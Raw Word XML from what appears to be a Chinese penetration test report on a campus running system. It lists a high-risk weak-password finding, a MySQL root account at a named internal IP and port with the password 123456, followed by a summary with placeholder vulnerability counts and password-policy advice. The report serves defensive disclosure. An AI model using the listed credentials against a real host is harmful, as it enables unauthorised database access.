      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启鉴权功能，关闭不必要接口，收缩暴露面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28590742">
      <w:pPr>
        <w:pStyle w:val="106"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc15571"/>
      <w:bookmarkStart w:id="96" w:name="_Toc23905"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>弱口令风险</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="536A92D3">
      <w:pPr>
        <w:pStyle w:val="109"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc20945"/>
      <w:bookmarkStart w:id="98" w:name="_Toc21904"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>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14:paraId="4C129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6" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="9CC2E5" w:themeFill="accent1" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="215D3A11">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C744BC">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>账户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D5F1559">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7187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6" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="9CC2E5" w:themeFill="accent1" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="6221158D">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>10.9.18.205:3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C653474">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1106AEFB">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="300ECA6B">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4D6DA4">
      <w:pPr>
        <w:pStyle w:val="107"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>风险等级</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>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566"/>
        <w:gridCol w:w="1186"/>
        <w:gridCol w:w="1075"/>
        <w:gridCol w:w="1140"/>
        <w:gridCol w:w="1123"/>
        <w:gridCol w:w="1073"/>
        <w:gridCol w:w="1112"/>
      </w:tblGrid>
      <w:tr w14:paraId="6947D5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1566" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="8EAADB" w:themeFill="accent5" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B2F5408">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>威胁级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1186" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78FAC5B6">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1075" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CABD0D8">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>■</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6548AF41">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1123" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F297E52">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1073" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19186D57">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>低危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22BC3DA5">
            <w:pPr>
              <w:pStyle w:val="113"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
    </w:tbl>
    <w:p w14:paraId="6E61F25D">
      <w:pPr>
        <w:pStyle w:val="112"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6BDC56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修复弱口令问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D64CA">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A32AC14">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5585B086">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4323E0E9">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1217C6">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73AEE5AB">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5802544D">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C878DA">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD89386">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F86C3B2">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0DE526">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FE2B12">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1EF5DF">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A28A83E">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63542B24">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6FDEDF">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B676D4">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C3580C">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:p w14:paraId="31C0C842">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc411010714"/>
      <w:bookmarkStart w:id="100" w:name="_Toc11859785"/>
      <w:bookmarkStart w:id="101" w:name="_Toc15461962"/>
      <w:bookmarkStart w:id="102" w:name="_Toc14434"/>
      <w:bookmarkStart w:id="103" w:name="_Toc15464575"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全风险总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="0534EE64">
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc11859787"/>
      <w:bookmarkStart w:id="105" w:name="_Toc296610733"/>
      <w:bookmarkStart w:id="106" w:name="_Toc394569409"/>
      <w:bookmarkStart w:id="107" w:name="_Toc8059"/>
      <w:bookmarkStart w:id="108" w:name="_Toc15461964"/>
      <w:bookmarkStart w:id="109" w:name="_Toc15464577"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全概况</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:bookmarkEnd w:id="105"/>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="24ED4F44">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:wordWrap/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>经过测试发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>校跑</w:t>
      </w:r>
      <w:r>
        <w:t>系统存在安全漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx个</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D7DA2">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:wordWrap/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx个，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FFC000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx个，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx个。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9E735">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:wordWrap/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，我们认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>校跑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统安全状态为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>紧急状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1CFA43">
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc394569411"/>
      <w:bookmarkStart w:id="111" w:name="_Toc15461965"/>
      <w:bookmarkStart w:id="112" w:name="_Toc11859788"/>
      <w:bookmarkStart w:id="113" w:name="_Toc15464578"/>
      <w:bookmarkStart w:id="114" w:name="_Toc14206"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全管理方面</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="7E82438F">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进一步落实口令管理制度，建议使用独立的、随机生成的满足强度要求的口令，严禁使用弱口令、统一口令管理服务器，及时销毁临时、测试账户；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5497085C">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进一步加强人员安全意识教育，预防攻击事件发生。例如周期性的修改信息系统口令、尽可能的使用客户端收发电子邮件、退出使用WEB邮箱系统时一定要注意注销用户而不是关闭浏览器等等；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A099EC8">
      <w:pPr>
